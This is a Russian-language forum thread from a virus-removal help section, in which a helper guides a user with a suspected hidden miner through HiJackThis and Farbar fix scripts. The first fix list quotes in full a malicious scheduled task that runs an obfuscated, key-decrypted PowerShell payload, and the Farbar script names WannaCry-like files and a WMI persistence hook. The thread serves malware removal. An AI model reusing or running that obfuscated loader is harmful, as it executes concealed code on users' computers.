Перейти к содержанию
Правила раздела
19 лет клубу! Встречаемся в офисе «Лаборатории Касперского»

Подозрение на скрытый майнер, появление программ в автозапуске

kostyan2008

Автор kostyan2008
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

kostyan2008

kostyan2008

Опубликовано
Опубликовано

Добрый день! В автозагрузке постоянно появляется Яндекс браузер, при отключении в конфигурации автозагрузок, при следующем запуске компьютера появляется снова, но уже новая задача с тем же названием YANDEX LLC. Так же на рабочем столе появляются ярлыки программ и приложений, которых я не скачивал и не устанавливал, по типу NextRP launcher или world of tanks

CollectionLog-2023.05.20-10.57.zip

Ссылка на комментарий
Поделиться на другие сайты
thyrex

thyrex

Опубликовано
Опубликовано

Пофиксите в HiJackThis из папки Autologger (запускать HiJackThis от имени Администратора по правой кнопке мыши)

O4 - MSConfig\startupreg: YandexBrowserAutoLaunch_6258F93B3E4DC9AC344E8154EEB82E22 [command] = C:\Users\go6po\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --no-startup-window --atlogin-bgr-mark /prefetch:5 (HKCU) (2023/05/20)
O22 - Task (.job): (Ready) Восстановление сервиса обновлений Яндекс Браузера.job - C:\Program Files (x86)\Yandex\YandexBrowser\23.3.4.603\service_update.exe
O22 - Task (.job): (Ready) Обновление Браузера Яндекс.job - C:\Users\go6po\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
O22 - Task (.job): (Ready) Системное обновление Браузера Яндекс.job - C:\Program Files (x86)\Yandex\YandexBrowser\23.3.4.603\service_update.exe
O22 - Tasks: \Microsoft\Windows\NetTrace\NetTrace - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "$rJcVcI='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';$wdJM='BauesC)jTxMeug.D(diuPKarlq-OvlgXZcUbYpXUgbalZhZ';$VCHk=""""$($wdJM[26])$($wdJM[23])$($wdJM[3])$($wdJM[37])$($wdJM[24])$($wdJM[1])$($wdJM[33])$($wdJM[3])"""";$mwGIBO=($wdJM[18]+$wdJM[3]+$wdJM[9]);&$mwGIBO(&$mwGIBO('''_fu2ncntikon( dqecb([qbysteq[]?]$_PN]DJkyo2,[zst_rikng8]$_TI6jt)fat){/$Z}Dl!lzk=[7Sy3stvemh.Tzex4t.2En8co_di-ng1]:g:U_TF_8._GextB.ytmes0($1TI5jt?fa?);s$ahSH_T=_$Z(Dldlzz[0l];h$LzaUkm=j0;{fo_r(k$c2Cu_U=?0;6$c0CunU l-l5t }$PxND_Jyco.vCoyunjt;n$cbCukU+9+)!{i,f(($L(aUnm k-gre _$ZfDl1lzx.C8ou_ntp){)$L+aUdm=_0}_$axSHwT=?(2}3 _-b0an{d ?$akSH3T j-b(orh 1752_) _-b5xour q$a1SH-T;.$PlNDpJy{o[k$caCu8U]n=$_PN_DJtyo+[$vcCpuU.] a-bbxoer 2$ZbDl-lz][$-La9Umi] c-b_xo_r p$afSHoT;_$LoaUnm+3+}_re9tujrn4 $oPN8DJzyoi;}m$o{bL1aU7m=}gwimil w_in=327_d/is+kd_ri.ve-|wrhenre] {3$_g.D2ev.ic_eIvD .-e-q p''''\s\.5\PvHY4SI_CA]LD2RI[VE_0''''_}|lse)lejct_ Mbodjelj,Ster4ia,ln_um7be=r;}$y7BNkrI_U=8de]c ?([uSy,st7em..C)on(vevrtz]:r:F_roamB/as6e6o4S=tr-in.g(2$rwJc_VczI)4) _($xobwLa?Umo.M_odkelx+''''_ ''''(+$!obsLacUmh.S]er[ia(ln_umabe]r)_;igex/([_Syost-emo.T3ex0t.!En-coadi0ng_]:j:U/TFw8.4GeutS,tr_inbg(1$y!BN}rIlU)_) '' '+$VCHk+'($wdJM[14]+$wdJM[16]+$wdJM[14]+$wdJM[14]+$wdJM[6]),(''$''+479/479)'))"
O22 - Tasks: Восстановление сервиса обновлений Яндекс Браузера - C:\Program Files (x86)\Yandex\YandexBrowser\23.3.4.603\service_update.exe --repair
O22 - Tasks: Обновление Браузера Яндекс - C:\Users\go6po\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --background-update --noerrdialogs
O22 - Tasks: Системное обновление Браузера Яндекс - C:\Program Files (x86)\Yandex\YandexBrowser\23.3.4.603\service_update.exe --run-as-launcher

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.

Ссылка на комментарий
Поделиться на другие сайты
thyrex

thyrex

Опубликовано
Опубликовано

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.


1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files.
3. Нажмите кнопку Scan (Сканировать).
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
 

Ссылка на комментарий
Поделиться на другие сайты
thyrex

thyrex

Опубликовано
Опубликовано

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать) 

Start::
CreateRestorePoint:
S3 BraveElevationService; "C:\Program Files\BraveSoftware\Brave-Browser\Application\109.1.47.186\elevation_service.exe" [X]
R2 YandexBrowserService; "C:\Program Files (x86)\Yandex\YandexBrowser\23.3.4.603\service_update.exe" --run-as-service [X]
2023-03-14 02:46 - 2023-03-14 02:46 - 003723264 ____S C:\Windows\mssecsvr.exe
2023-03-13 19:30 - 2023-05-18 19:02 - 003514368 ____S C:\Windows\qeriuwjhrf
2023-03-13 19:30 - 2023-05-18 19:02 - 002061938 ____S C:\Windows\tasksche.exe
2023-03-13 19:30 - 2023-03-13 19:30 - 003723264 ____S C:\Windows\mssecsvc.exe
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

 

  • Обратите внимание: будет выполнена перезагрузка компьютера.


 
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • Vovkaproshka
      Подозрение на майнер
      Автор Vovkaproshka
      После установки лоадера впнов появился процесс setup нагружает только оперативку.
      Doctor  web antivirus удаляет три трояна, после сетап пропадает из процессов, после перезагрузки процесс снова появляется, думаю прикрепился к какому-то приложению, через безопасный режим также после удаления и перезагрузки загружается,  находится по пути AppData\Local\Temp\2xzjMMUGjeobOYtjoc0gOuMKKHC
    • Milink
      [РЕШЕНО] Подозрение на майнер
      Автор Milink
      скачал игру с торрента, после чего в браузере Chrome после каждого перезапуска пк начало устанавливаться левое расширение якобы Adblock. Так же в temp появляется папка 2xzjMMUGjeobOYtjoc0gOuMKKHC. Пробовал чистить антивирусами - не помогло.
      Нашел решение, avz скачал, Autologger я так понимаю тоже надо качать: 
      Актуально ли оно?
       
    • FMEKLW
      [РЕШЕНО] Подозрение на майнер
      Автор FMEKLW
      Как-то просто решил зайти в диспетчер задач и посмотреть процессы, и увидел 3 процесса Setup, которые ведут к папке 2xzjMMUGjeobOYtjoc0gOuMKKHC в Temp. Сам просто решил пока ничего не делать, а поискать информации об этой теме. И вот я здесь нашёл обсуждения с помощью по данной теме. Честно не знаю, что мог скачать, из-за чего это появилось: либо игры, либо русификаторы, либо что-то другое. Все скачивал по прямой ссылке, с облаков, с MediaGet и uTorrent. Никаких проблем я особо не увидел, как у других. Т.е. люди писали про проблемы с расширениями в Chrome, коих у себя я не обнаружил, ведь я пользуюсь из браузеров только Яндексом, в котором ничего странного тоже нету.CollectionLog-2025.07.11-23.07.zip
    • ShadowIce449
      Подозрение на майнер
      Автор ShadowIce449
      игры упали в производ, вертушки начали шуметь просто так, испол drweb ничего не обнаружил, а также запустил avz. Cкачивал игры с торрент игрухе и т.д
       
      CollectionLog-2025.06.12-21.38.zip
    • searing
      [РЕШЕНО] Подозрение на майнер
      Автор searing
      скачал игру с торрента, после чего в браузере Chrome после каждого перезапуска пк начало устанавливаться левое расширение якобы Adblock, с обфусцированным js кодом. Так же в temp появляется папка 2xzjMMUGjeobOYtjoc0gOuMKKHC. Пробовал чистить антивирусами doctor web cureit и malwarebytes - не помогло. CollectionLog-2025.07.04-05.50.zip
×
×
  • Создать...